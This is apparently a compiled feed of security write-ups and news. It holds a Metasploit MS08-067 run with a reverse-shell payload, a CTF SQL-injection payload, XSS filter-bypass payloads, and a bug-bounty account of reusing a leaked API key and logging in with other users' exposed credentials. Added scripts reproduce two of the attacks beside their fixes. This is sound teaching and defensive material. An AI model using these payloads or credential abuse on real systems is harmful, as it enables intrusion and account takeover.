msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 > set RHOSTS IP
msf6 > set LHOST eth0
msf6 > run

This is the typical setup with Metasploit, but I used Armitage since the user interface was more productive for me.

Meterpreter session 1 opened - MS08-067 Exploit on Windows XP

What did we see here?

No social engineering was needed.
No need for opening/executing files on the target.
Just an automatic exploit that needed one firewall configuration change.

A key takeaway that I wanted to demonstrate here was the gap between Vulnerability and Risk.

In some context, there was no active risk until I enabled a Firewall exception for File and Printer Sharing (SMB, port 445).

Vulnerabilities do not imply immediate active risk unless there is a method and opportunity of exploitation.

It should be noted, however, that Windows XP has reached EOL (End of Life) for security updates, and Windows XP is not recommended for production or development environments.

A simple demonstration for a major concern.

Happy Hacking!

Windows XP is Hackable or Nah? Let's Test That! was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
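The post's point is that a vulnerability only becomes a risk once the port is reachable. An added example, not the author's code: a small triage script over nmap XML (the -oX form of the --script=vuln scan in the post) that reports a host as exploitable only when port 445 is open and an smb-vuln-* host script records state VULNERABLE, and separately lists hosts where SMB is filtered and therefore not assessable. The XML is constructed in the shape nmap emits; both hosts, their addresses and the script results are invented.

```python
"""Triage nmap --script=vuln XML output: a host is a finding only if port 445 is
actually reachable and an smb-vuln-* script reports VULNERABLE. Added example, not the
post author's code; the XML is constructed in the shape nmap writes (host/ports/port/state
and hostscript/script with a table/elem key="state")."""
import xml.etree.ElementTree as ET

NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -A --script=vuln 192.168.56.0/24 -oX scan.xml">
  <host><status state="up"/><address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="VULNERABLE: Microsoft Windows system vulnerable to remote code execution (MS08-067)">
        <table key="CVE-2008-4250"><elem key="state">VULNERABLE</elem><elem key="risk_factor">HIGH</elem></table>
      </script>
      <script id="smb-vuln-cve2009-3103" output="NOT VULNERABLE">
        <table key="CVE-2009-3103"><elem key="state">NOT VULNERABLE</elem></table>
      </script>
    </hostscript>
  </host>
  <host><status state="up"/><address addr="192.168.56.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="filtered"/><service name="microsoft-ds"/></port>
    </ports>
  </host>
</nmaprun>
"""


def _scripts(host):
    """Yield (script id, state) from both host-level and port-level script elements."""
    for script in host.iter("script"):
        state_elem = script.find("./table/elem[@key='state']")
        state = state_elem.text if state_elem is not None else ""
        # Older scripts only put the verdict in the output attribute.
        if not state and (script.get("output") or "").upper().startswith("VULNERABLE"):
            state = "VULNERABLE"
        yield script.get("id"), state


def triage(nmap_xml):
    """Per host: is SMB reachable, which smb-vuln-* scripts say VULNERABLE, and a priority."""
    results = []
    for host in ET.fromstring(nmap_xml).iter("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        smb_open = any(p.get("portid") == "445" and p.find("state").get("state") == "open"
                       for p in host.iter("port"))
        vulns = sorted(sid for sid, state in _scripts(host)
                       if sid.startswith("smb-vuln-") and state == "VULNERABLE")
        if smb_open and vulns:
            priority = "exploitable"
        elif smb_open:
            priority = "exposed, no confirmed vuln"
        else:
            priority = "not reachable"
        results.append({"addr": addr, "smb_open": smb_open, "vulns": vulns, "priority": priority})
    return results


if __name__ == "__main__":
    for row in triage(NMAP_XML):
        print(row)
```

The second host is the "vulnerable but not at risk" case from the post: nothing can be said about it from the network, and a tracker that files it as a finding would be reporting a vulnerability that has no exposure.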

Paginator v2 is a web challenge from NullCon CTF 2025.

Link for the challenge: http://52.59.124.14:5015/

Paginator v2

On accessing the link, I got a webpage like the one below:

Paginator v2 webpage

On clicking "Show me pages 2-10", it gives records of pages from ID 2 to 10.

Pages from ID 2 to 10

Now, I checked the source code of this webpage.

Source code of Paginator v2

Here, in the first try block, it executes a create table command and 10 insert commands. Unlike Paginator v1, where the flag was encoded as a base64 string in the first record of the pages table, here the flag is not in the pages table at all. So, basic SQL injection commands won't work.

Basic SQLi payload result

Therefore, I came to the conclusion that they might have made a new table related to it. So, I checked up on some union-based injection payloads. I guessed the name of the table to be "flag" and since I had no information on the number of rows or the row in which the flag was present, I had to use an asterisk (*).

So, the payload became:

2,10 UNION SELECT * FROM flag

Union-based SQLi payload result

BINGO! I got the base64-encoded flag. Now, I just had to decode it.

Decode base64 flag

FLAG: ENO{SQL1_W1th_0uT_C0mm4_W0rks_SomeHow_AgA1n_And_Ag41n!}

References:
1. SQL Injection Using UNION
2. Base64 Decode and Encode - Online

Paginator v2 - NullCon CTF 2025 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
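To see why "2,10 UNION SELECT * FROM flag" works and what would have stopped it, here is an added example that is not the challenge's real source: an in-memory SQLite copy of the schema with an assumed vulnerable handler (a single "lo,hi" parameter split on the comma and formatted into a range query) next to a parameterised one. The handler shape, the flag table layout and the flag value are assumptions made for the demonstration.

```python
"""Reproduce the Paginator-style UNION injection against an in-memory SQLite copy of the
challenge schema, side by side with the parameterised fix. Added example, not the
challenge's real source: the handler shape (a single "lo,hi" parameter spliced into a
range query) and the flag table layout are assumptions; the flag value is a dummy."""
import base64
import sqlite3

FLAG = "ENO{dummy_flag}"  # constructed stand-in for the real flag


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO pages VALUES (?, ?)", [(i, f"page {i}") for i in range(1, 11)])
    # Assumed: a second, unreferenced two-column table holding the base64 flag.
    con.execute("CREATE TABLE flag (id INTEGER, value TEXT)")
    con.execute("INSERT INTO flag VALUES (1, ?)", (base64.b64encode(FLAG.encode()).decode(),))
    return con


def pages_vulnerable(con, page_range):
    """Assumed vulnerable handler: "2,10" is split once on the comma and both halves are
    formatted straight into the SQL, so the upper bound can carry a trailing UNION."""
    lo, hi = page_range.split(",", 1)
    sql = f"SELECT id, title FROM pages WHERE id >= {lo} AND id <= {hi}"
    return con.execute(sql).fetchall()


def pages_safe(con, page_range):
    """Hardened handler: coerce both bounds to int (ValueError on anything else) and bind them."""
    lo, hi = (int(part) for part in page_range.split(",", 1))
    return con.execute("SELECT id, title FROM pages WHERE id >= ? AND id <= ?", (lo, hi)).fetchall()


def safe_rejects(con, page_range):
    """True if the hardened handler refuses the input outright."""
    try:
        pages_safe(con, page_range)
    except ValueError:
        return True
    return False


def extract_flag(con, payload="2,10 UNION SELECT * FROM flag"):
    """The write-up's payload: the UNION succeeds because flag has the same column count (2)
    as the projected pages columns. Returns the decoded flag, or None if nothing leaked."""
    rows = pages_vulnerable(con, payload)
    leaked = [value for _, value in rows if not str(value).startswith("page ")]
    return base64.b64decode(leaked[0]).decode() if leaked else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable handler leaks:", extract_flag(db))
    print("safe handler rejects payload:", safe_rejects(db, "2,10 UNION SELECT * FROM flag"))
```

The column-count constraint is why SELECT * was a gamble that paid off: had the flag table carried three columns, the UNION would have errored and the author would have needed to enumerate the width first.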

XSS - Bypassing WAF with Hex Overflow

Hello, I'm Syed Mushfik Hasan Tahsin aka SMHTahsin33, a 20 Y/O Cyber Security Enthusiast from Bangladesh. Passionately doing Bug Bounties in my free time solely out of curiosity. I am an eWPTXv2 as well.

Today I will be writing about how I bypassed the BIG-IP Local Traffic Manager (F5 Networks) Web Application Firewall using Hex Overflow.

The story will go with a straight flow, but in reality the situation was a little bit backward: more like solving the problem first, then knowing what the actual problem was.

Before I start, a huge thanks to @Gareth Heyes for the invaluable help in gaining a deeper understanding of this!

Let's get started!

The XSS

Initially, after observing that the input was unsanitized, I input a simple payload <svg onload=alert()>. This was immediately blocked.

So I started probing until the block was gone, and came to <svg onload>, meaning onload= (with the equal sign) was actually getting blocked. After seeing this, I tried all possible event handlers there, and nothing worked out. Dead end?

Introducing - Hex Overflow

Hex or Hexadecimal is a base-16 number system allowing 0-F (0123456789ABCDEF), maxing out at FF. It is very common to us that reserved or unsafe characters [RFC 1738 2.2] are encoded in the URL as two hex digits following a percent sign '%', like %23 is the hex representation of the hash/fragment symbol '#'.

Hex Overflow occurs when a malformed URL decoder is used while handling the URL and allows characters over the hex limit of 0-F, extending to the usage of other alphabets, including symbols too: [ ] { } ; : < > ! & and more.

The decoder used in my target was a lot confusing and didn't make sense at all, to be honest. I can guess they also used more than one logic behind the decoder. The output was all in small letters, adding to the confusion.

What do you expect when you input %5%? The output is 'e' or 0x55. Wondering how?

The decoder takes the first 5, then decodes the second '%' symbol to %25, ignores the first nibble '2' and takes the 5 from there, making it %55. And as it was an overflown character, it does a -1 from the first nibble of the result, making it %45, a capital 'e'. So %7% resulted in %65 or capital 'e'. And yes, %8% and %6% resulted in %75 or small 'u' and %55 or capital 'u' respectively.

Now you might be wondering how it was handling the alphabet parts of the hex. The answer is: pretty weirdly! In the first stage it was handling abcdef normally, but when overflowing it was calling the alphabets with an index number which started from 'g' as 0.

Upon more observation, I found out that it can be used as 2 different sets. And when mixed, it is something like this.

If any of the characters from the two sets are used together, a +1 can be seen on the first nibble if it is from the green set, meaning an input of %5g, which is %50 according to this chart, will output '%(5+1)0' or %60 → ` (backtick). Again, if it's %hz (h is from the 2nd set), which is %13 according to the chart, it will output '%(1+2)3' or %33 → '3'.

The worst part of all this is that the pattern is not always constant and the full workflow couldn't be calculated. Sometimes it did +1, for some it did +2 or +3, and for some also a subtraction from the first nibble. But this understanding was enough for my bypass.

The Bypass

As in the beginning we saw that there was no way this could possibly be bypassed, as each and every handler was blocked, we needed some other way around.

Using Hex Overflow, we can generate a single ASCII character in a whole lot of different ways. If you already understand, you can actually represent the "=" equal sign (%3d) also by '%3=', which can be explained like %3 %3d, where the first nibble gets ignored, making it again %3d. Also '%zd', '%z=', '%jd', '%it' (-1 from the first nibble in this case).

We can use all of these in place of the equal sign, like <svg onload%jdonload=alert()>.

It again blocked our payload. Reason? This time alert() was the blocked function. This was easily bypassed by optional chaining → alert?.().

It doesn't just stop here; other parts of the payload can be generated using hex overflow in a lot of other ways, like %0d (CR) as '%0=' or '%w=', making the payload <svg onload%w==alert()>.

Conclusion

This kind of flawed decoder is very rare to encounter, and all might not be flawed the same way. Playing with this was really fun for me.

Follow Me 🔗:
https://twitter.com/SMHTahsin33
https://www.youtube.com/@SMHTahsin33
https://www.facebook.com/smhtahsin33/

Thanks for reading, hope you all enjoyed. And don't forget to share. Bye until next time 👋

XSS - Bypassing WAF with Hex Overflow was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
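The bypass works because the WAF and the application decode "%jd" differently. An added example, not the author's code and not F5's decoder: a model of the over-permissive decoder class (letters beyond F accepted as hex digits with no range check, result truncated to one byte) that happens to reproduce several of the post's observations ("%jd", "%zd" and "%it" all yield "="), a strict decoder that rejects malformed escapes, and the same WAF rule evaluated on each view of the payload. The real device behaved less regularly than this model, and the payload used here is simplified from the post's.

```python
"""Model of the 'hex overflow' decoder bug class and of the WAF/backend mismatch it
creates. Added example, not the author's code and not F5's decoder: the lenient decoder
is an illustrative implementation (no range check on the hex digit, result truncated to
one byte) that reproduces several of the post's observations; the real device did not
behave this regularly."""
import re
from urllib.parse import unquote

HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
HANDLER_RE = re.compile(r"\bon[a-z]+\s*=", re.I)


def _lenient_nibble(c):
    """Digit or letter -> value with NO upper bound: 'g' is 16, 'j' is 19, 'z' is 35."""
    if c.isdigit():
        return ord(c) - ord("0")
    if "a" <= c <= "z":
        return ord(c) - ord("a") + 10
    if "A" <= c <= "Z":
        return ord(c) - ord("A") + 10
    return None


def lenient_percent_decode(s):
    """Flawed decoder: accepts any two letters/digits after '%', keeps only the low byte."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%" and i + 2 < len(s):
            hi, lo = _lenient_nibble(s[i + 1]), _lenient_nibble(s[i + 2])
            if hi is not None and lo is not None:
                out.append(chr(((hi << 4) | lo) & 0xFF))
                i += 3
                continue
        out.append(s[i])
        i += 1
    return "".join(out)


def strict_percent_decode(s):
    """Correct decoder: '%' must be followed by exactly two hex digits, else reject."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "%":
            if not HEX2.fullmatch(s[i + 1:i + 3]):
                raise ValueError(f"malformed escape at offset {i}: {s[i:i + 3]!r}")
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def passthrough_decode(s):
    """Python's urllib behaviour: malformed escapes are passed through unchanged, not rejected."""
    return unquote(s)


def waf_blocks(payload, decoder):
    """WAF rule 'block any on<event>=' evaluated on the decoder's view of the input.
    A decoder that raises on a malformed escape counts as a block."""
    try:
        return HANDLER_RE.search(decoder(payload)) is not None
    except ValueError:
        return True


def backend_sees_handler(payload):
    """Does the (lenient) backend end up with an on<event>= attribute?"""
    return HANDLER_RE.search(lenient_percent_decode(payload)) is not None


# Payload in the spirit of the post: the '=' after onload is smuggled as %jd.
PAYLOAD = "<svg onload%jdalert()>"

if __name__ == "__main__":
    print("backend view:", lenient_percent_decode(PAYLOAD))
    print("WAF with pass-through decoder blocks:", waf_blocks(PAYLOAD, passthrough_decode))
    print("WAF with strict decoder blocks:", waf_blocks(PAYLOAD, strict_percent_decode))
    print("backend executes handler:", backend_sees_handler(PAYLOAD))
```

The defensive lesson is in the last two calls: a WAF that decodes like a correct client never sees "onload=" and lets the payload through, while one that rejects any escape a correct client could not have produced blocks it without needing to know how the backend misbehaves.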

Your $2M security stack is useless if I'm lazier than your IT team.

by InfoSec Write-ups

Hey there, fellow security enthusiasts! Today, we're going to talk about something that might blow your mind: how an SMTP conversation can accidentally lead to exposing PII. Yeah, that's right! Many organizations rely on SMTP (Simple Mail Transfer Protocol) for their email communications, but sometimes they don't realize how easily sensitive data can leak through these conversations, especially when it's misconfigured.

I was hunting on a private program. I had done basic recon and started checking the in-scope domains and subdomains one by one. There was signup functionality on a subdomain. I filled in the mandatory details and tested the signup functionality. I was going through Burp history. Then I found there was an SMTP conversation in the response when registration was successful. At the bottom of the SMTP conversation there was a link to an API which sends an email and text message to the user after successful registration. They are using a third-party API for sending emails and text messages to the contact number. That third-party API was using the GET method.

SMTP conversation in response

That SMTP response revealed a third-party API link, which exposed the API key, username, message, sender's name, and template ID. I simply copied that link and pasted it in the browser and, boom! You've got yourself a security risk. I received the same message a second time. I tried 4 times, and I received 4 text messages [financial loss]. I played with that API a few times. I was able to send an OTP or text, whatever I wanted, to any random number.

Remaining Balance

Then I went to that third-party website and signed up for an account. And read the documentation. I found the wallet and report API. When I hit the report API, I was able to see usernames, passwords [generated passwords], full names, and contact numbers.

I tried to log in with those creds, and I was able to log in successfully.

Date wise report

That's all fellas. Stay safe and keep hacking (ethically, of course 😉)!!!

Instagram: th3.d1p4k
Twitter: Dipak Panchal
LinkedIn: Dipak Panchal

PII Exposure: The Data Heist You Never Knew Was Possible! was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

In this post, we'll delve into what SBOMs are, why they're necessary, and their role in open source security.

by Snyk

Online food ordering and delivery platform GrubHub suffered a data breach that exposed the personal information of drivers and customers. This week the online food ordering and delivery firm GrubHub disclosed a data breach that exposed customer and driver information.  Recently, the company detected an anomalous activity within its infrastructure, then it launched an investigation […]

by Security Affairs

Explore the critical role of cyberattacks in shaping the modern space race. Learn how nation-states and organizations must adapt their cybersecurity measures to protect global economies, military operations, and the future of space exploration.

by Recorded Future

This vulnerability allows remote attackers to bypass authentication on affected installations of Logsign Unified SecOps Platform. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-1044.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Mintty. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-1052.

by Zero Day Initiative Advisories

Fraud groups are using cutting-edge technology to scale their operations to create fake identities and execute fraud campaigns.

by Dark Reading

The security startup's autonomous security remediation platform uses off-the-shelf large language models (LLMs) to analyze security alerts and apply the fixes.

by Dark Reading

Netgear disclosed two critical flaws impacting multiple WiFi router models and urges customers to address them. Netgear addressed two critical vulnerabilities, internally tracked as PSV-2023-0039 and PSV-2021-0117, impacting multiple WiFi router models and urged customers to install the latest firmware. The two flaws are, respectively, a remote code execution issue and an authentication bypass vulnerability. […]

by Security Affairs

Researchers measured a threefold increase in credential stealing between 2023 and 2024, with more than 11.3 million such thefts last year.

by Dark Reading

Targets are lured into a fake interview process that convinces them to download malware needed for a virtual interview.

by Dark Reading

One of our customers, a financial sector company, had a complex backup strategy in place. Learn about the help and benefits they’re now getting from Barracuda Backup and Barracuda Cloud-to-Cloud Backup in this post.

by Barracuda

Israeli spyware maker Paragon Solutions confirmed to TechCrunch that it sells its products to the U.S. government and other unspecified allied countries. Paragon's executive chairman John Fleming said in a statement to TechCrunch on Tuesday that "Paragon licenses its technology to a select group of global democracies — principally, the United States and its allies." […]

by TechCrunch

Recently, I started working with my children's school to enhance their online safety measures and develop a digital mindfulness course in collaboration with their digital literacy lead.

by KnowBe4

Nearly half (46%) of businesses observed an increase in deepfakes and generative AI-related fraud last year, a new report from AuthenticID has found.

by KnowBe4

Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems. The package, named github.com/boltdb-go/bolt, is a typosquat of the legitimate BoltDB database module (github.com/boltdb/bolt), per Socket. The malicious version (1.3.1) was published to

by The Hacker News

Ransomware actors are offering individuals millions to turn on their employers and divulge private company information, in a brand-new cybercrime tactic.

by Dark Reading

Funnull CDN rents IPs from legitimate cloud service providers and uses them to host criminal websites, continuously cycling cloud resources in and out of use and acquiring new ones to stay ahead of cyber-defender detection.

by Dark Reading

Attacks on supply chains were one of the biggest threats in 2024. We discuss the most notable incidents of last year, and their consequences for the attacked.

by Kaspersky

A recently patched security vulnerability in the 7-Zip archiver tool was exploited in the wild to deliver the SmokeLoader malware. The flaw, CVE-2025-0411 (CVSS score: 7.0), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. It was addressed by 7-Zip in November 2024 with version 24.09. "The vulnerability was

by The Hacker News

The North Korean threat actors behind the Contagious Interview campaign have been observed delivering a collection of Apple macOS malware strains dubbed FERRET as part of a supposed job interview process. "Targets are typically asked to communicate with an interviewer through a link that throws an error message and a request to install or update some required piece of software such as VCam or

by The Hacker News

Bohemia Interactive, the developer behind Arma Platform and DayZ, has been struggling with a sustained distributed denial-of-service (DDoS) attack that has crippled its online services for over a week. The attack, which initially targeted Arma Reforger and DayZ servers, has left players unable to access official and community servers, leading to widespread frustration and speculation. … The post Ransom DDoS Attack Disrupts Bohemia Interactive’s Gaming Servers appeared first on CyberInsider.

by Cyber Insider

Home Affairs Minister Tony Burke said the Chinese AI app posed unacceptable risk.

by ITPro Today

The FBI joined authorities across Europe last week in seizing domain names for Cracked and Nulled, English-language cybercrime forums with millions of users that trafficked in stolen data, hacking tools and malware. An investigation into the history of these communities shows their apparent co-founders quite openly operate an Internet service provider and a pair of e-commerce platforms catering to buyers and sellers on both forums.

by Krebs on Security

IT asset management is no longer just about tracking software licenses — it now plays a critical role in cloud cost management, cybersecurity, and compliance.

by ITPro Today

Morphisec uncovers a new ValleyRAT malware variant with advanced evasion tactics, multi-stage infection chains, and novel delivery methods…

by Hackread

As cloud security evolves in 2025 and beyond, organizations must adapt to both new and evolving realities, including the increasing reliance on cloud infrastructure for AI-driven workflows and the vast quantities of data being migrated to the cloud. But there are other developments that could impact your organizations and drive the need for an even more robust security strategy. Let’s take a

by The Hacker News

Reimagining your SOC Part 2/3: This blog explores how the challenges facing the modern SOC can be addressed by transforming the investigation process, unlocking efficiency and scalability in SOC operations with AI.

by Darktrace

Valley News Live exposed more than a million job seeker’s resumes through an open AWS S3 bucket

by Malwarebytes Labs

""Agentic"" AI could arrive in 2025, and it may allow hackers to send individual, AI-powered agents to do their dirty work.

by Malwarebytes Labs

The ThreatDown State of Malware report focuses on a few key developments that we witnessed in 2024.

by ThreatDown

Cato Networks, the SASE leader, today announced the appointment of Karl Soderlund as the company’s global channel chief. In his role at Cato, Soderlund will be responsible for leading the global channel team and further scaling the global partner program.  With 30 years of experience in the cybersecurity and networking industries, Soderlund has a proven […] The post Cato Networks Appoints Karl Soderlund as Global Channel Chief to Accelerate Channel Growth in SASE Market appeared first on IT Security Guru.

by IT Security Guru

Taiwan has become the latest country to ban government agencies from using Chinese startup DeepSeek's Artificial Intelligence (AI) platform, citing security risks. "Government agencies and critical infrastructure should not use DeepSeek, because it endangers national information security," according to a statement released by Taiwan's Ministry of Digital Affairs, per Radio Free Asia. "DeepSeek

by The Hacker News

Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

by PortSwigger Research

Organizations and development teams need to evolve from "being prepared" to "managing the risk" of security breaches.

by Dark Reading

If you want additional ransomware protection on your machine, you should use one that offers thorough scans, a user-friendly interface, and compatibility with your preferred operating system.

by ZDNET Security

A security vulnerability has been disclosed in AMD's Secure Encrypted Virtualization (SEV) that could permit an attacker to load a malicious CPU microcode under specific conditions. The flaw, tracked as CVE-2024-56161, carries a CVSS score of 7.2 out of 10.0, indicating high severity. "Improper signature verification in AMD CPU ROM microcode patch loader may allow an attacker with local

by The Hacker News

A massive data breach at online betting platform 1win has now been confirmed by Have I Been Pwned (HIBP), affecting over 96 million users worldwide. The leaked data, which includes email addresses, phone numbers, IP addresses, dates of birth, geographic locations, and SHA-256 hashed passwords, has been circulating on hacking forums since November 2024. Reports … The post Data Breach at Betting Platform 1win Exposed 96 Million Users appeared first on CyberInsider.

by Cyber Insider

Green software development represents an untapped opportunity for many organizations. It can dial up performance and slash costs.

by ITPro Today

Today, we are launching a new dedicated “AI Insights” page on Cloudflare Radar that incorporates this graph and builds on it with additional metrics.

by Cloudflare

Have you ever wished you had an assistant at your security operations centers (SOCs) — especially one who never calls in sick, has a bad day or takes a long lunch? Your wish may come true soon. Not surprisingly, AI-driven SOC “co-pilots” are topping the lists for cybersecurity predictions in 2025, which often describe these […] The post How AI-driven SOC co-pilots will change security center operations appeared first on Security Intelligence.

by Security Intelligence

In a previous Trustwave SpiderLabs’ blog, we explored how cybercriminals exploit Facebook Messenger chatbots to execute social engineering attacks, deceiving users into falling victim to scams and phishing schemes. These attacks often rely on the perceived legitimacy of automated systems to manipulate users into sharing sensitive information.

by SpiderLabs Blog

The cybersecurity landscape in EMEA is facing a wave of AI-driven cyber warfare, the evolution of ransomware into data extortion, and an expanding attack surface in cloud environments, according to the latest findings from Check Point Software. The company presented its insights at CPX Vienna 2025, an annual cybersecurity event bringing together industry leaders, security […] The post AI-Powered Cyber Warfare, Ransomware Evolution, and Cloud Threats Shape 2025 Cyber Landscape appeared first on IT Security Guru.

by IT Security Guru

Arctic Wolf® and BlackBerry Limited today announced the successful closing of the acquisition of BlackBerry’s Cylance® endpoint security assets by Arctic Wolf. The two companies entered into a definitive agreement on December 15, 2024. “We are pleased to have successfully closed this pivotal transaction for BlackBerry and look forward to continuing our relationship with Arctic Wolf as a […] The post Arctic Wolf and BlackBerry Announce Closing of Acquisition for Cylance appeared first on IT Security Guru.

by IT Security Guru

Austin, TX, USA, 4th February 2025, CyberNewsWire

by Hackread

Zyxel urged users to replace their old devices with modern, supported versions.

by Cybersecurity Dive

Atomic Stealer, Poseidon Stealer and Cthulhu Stealer target macOS. We discuss their various properties and examine leverage of the AppleScript framework. The post Stealers on the Rise: A Closer Look at a Growing macOS Threat appeared first on Unit 42.

by Palo Alto Networks - Unit42

Overview

NETGEAR has recently addressed two critical security vulnerabilities affecting its products, which, if exploited, could allow unauthenticated attackers to execute arbitrary code or remotely exploit devices. These vulnerabilities impact multiple models, including the XR series routers and WAX series access points. Given the high severity of these vulnerabilities, with Common Vulnerability Scoring System (CVSS) scores of 9.8 and 9.6, users are strongly advised to update their devices immediately to the latest firmware versions to prevent potential cyber threats.

Details of the Security Vulnerabilities

The vulnerabilities impact several NETGEAR devices and could allow remote attackers to take control of the affected routers and access points without requiring authentication. Such security flaws are particularly concerning as they can be leveraged for malicious activities, including data theft, network disruption, and unauthorized surveillance.

Affected Devices and Firmware Updates

NETGEAR has released fixes for the unauthenticated remote code execution (RCE) security vulnerability affecting the following models:
XR1000: Fixed in firmware version 1.0.0.74
XR1000v2: Fixed in firmware version 1.1.0.22
XR500: Fixed in firmware version 2.3.2.134
NETGEAR strongly recommends that all users of these models download and install the latest firmware as soon as possible.

Steps to Update Your Firmware

To ensure your NETGEAR device is secure, follow these steps to update your firmware:
Visit the NETGEAR Support website.
Enter your device's model number in the search box and select the correct model from the drop-down list.
Click on Downloads.
Under Current Versions, select the download that begins with Firmware Version.
Click Download and follow the provided installation instructions in the product's user manual or firmware release notes.
Keeping your firmware updated is essential to maintaining the security and functionality of your device.

Why These Vulnerabilities Are Critical

Remote Code Execution (RCE): This type of vulnerability allows attackers to execute arbitrary commands remotely on the affected device, potentially leading to full device compromise.
Unauthenticated Exploitation: The vulnerabilities do not require authentication, making them highly dangerous as attackers can exploit them without needing login credentials.
Network Compromise: Once compromised, an attacker could intercept, modify, or reroute network traffic, potentially leading to data breaches, espionage, or further attacks on connected devices.
Given these risks, failing to apply the recommended firmware updates could leave users vulnerable to cyber threats, including botnet infections, malware deployment, and unauthorized access to sensitive information.

Security Advisory and NETGEAR's Stance

NETGEAR has released a security advisory under the identifier PSV-2023-0039, urging all affected users to take immediate action. Although no official CVE (Common Vulnerabilities and Exposures) IDs have been assigned, the company acknowledges the seriousness of these security issues.

Acknowledgments

The vulnerabilities were identified and reported through BugCrowd, a well-known security research platform specializing in vulnerability discovery and responsible disclosure. NETGEAR has rated the vulnerabilities as critical, with the CVSS score breakdown as follows:
CVSS Score: 9.8 (Critical)
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Best Practices for Keeping Your Devices Secure

To enhance security and prevent similar threats in the future, users should follow these best practices:
Regular Firmware Updates: Always keep your device's firmware up to date. Firmware updates often include security patches that address known vulnerabilities.
Use NETGEAR's Mobile Apps for Updates: Orbi products: use the NETGEAR Orbi app. WiFi routers: use the NETGEAR Nighthawk app. Business products: use the NETGEAR Insight app (firmware updates through this app require an Insight subscription).
Manual Firmware Updates: If your device is not supported by one of the apps, follow the manual update process via the official NETGEAR website.
Enable Automatic Updates: If available, enable automatic firmware updates to ensure you receive security patches as soon as they are released.
Change Default Credentials: If you haven't already, change the default administrator credentials on your NETGEAR device to a strong, unique password.
Monitor Network Activity: Keep an eye on unusual network behavior, such as unexpected reboots, unknown connected devices, or sudden drops in performance, which could indicate potential exploitation.
NETGEAR's prompt response and security advisory highlight the need for users to remain vigilant and prioritize regular firmware updates to protect against emerging threats. By taking the recommended steps, users can safeguard their devices from unauthorized access and maintain the integrity of their network security.

Source:
https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/93
https://kb.netgear.com/000066558/Security-Advisory-for-Unauthenticated-RCE-on-Some-WiFi-Routers-PSV-2023-0039

The post NETGEAR Urges Immediate Firmware Updates for Critical Security Flaws appeared first on Cyble.

by CYBLE

Actors linked to North Korea bypassed Apple security using malware called FlexibleFerret.

by Cybersecurity Dive

Microsoft has released patches to address two Critical-rated security flaws impacting Azure AI Face Service and Microsoft Account that could allow a malicious actor to escalate their privileges under certain conditions. The flaws are listed below - CVE-2025-21396 (CVSS score: 7.5) - Microsoft Account Elevation of Privilege Vulnerability CVE-2025-21415 (CVSS score: 9.9) - Azure AI Face Service

by The Hacker News

For years, the cybersecurity headlines have been dominated by news of sophisticated phishing campaigns and zero-day exploits. But behind these attention-grabbers lurks a far more subtle and explosive evolution in adversarial behavior. Today, we are proud to introduce the Red Report 2025, the fifth edition of our annual threat analysis from Picus Labs. This year’s key revelation? A massive uptick in infostealing malware and multi-stage “heist-style” campaigns that are pushing the boundaries of stealth and persistence, while actual AI-driven attacks remain more hype than reality.

by Picus Security

Google has shipped patches to address 47 security flaws in its Android operating system, including one it said has come under active exploitation in the wild. The vulnerability in question is CVE-2024-53104 (CVSS score: 7.8), which has been described as a case of privilege escalation in a kernel component known as the USB Video Class (UVC) driver. Successful exploitation of the flaw could lead

by The Hacker News

U.S. food delivery giant Grubhub says hackers accessed the personal details of customers and drivers after breaching its internal systems.  Grubhub is a popular food-ordering and delivery platform with more than 375,000 merchants and 200,000 delivery providers using its platform in more than 4,000 U.S. cities. New York-based Wonder Group acquired the company last fall […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Grubhub has disclosed a data breach stemming from a security incident involving a third-party service provider. The breach resulted in unauthorized access to certain user contact information, including names, email addresses, and phone numbers, as well as partial payment card details for some campus diners. The company took immediate action to contain the breach, terminated … The post Grubhub Discloses Data Breach Exposing Customer Information appeared first on CyberInsider.

by Cyber Insider

Dedicated clouds offer businesses full control over cloud infrastructure — ideal for specialized workloads but often at a higher cost. Here's when to choose them over private clouds.

by ITPro Today

Cybersecurity researchers have disclosed details of a now-patched vulnerability impacting the Microsoft SharePoint connector on Power Platform that, if successfully exploited, could allow threat actors to harvest a user's credentials and stage follow-on attacks. This could manifest in the form of post-exploitation actions that allow the attacker to send requests to the SharePoint API on behalf

by The Hacker News

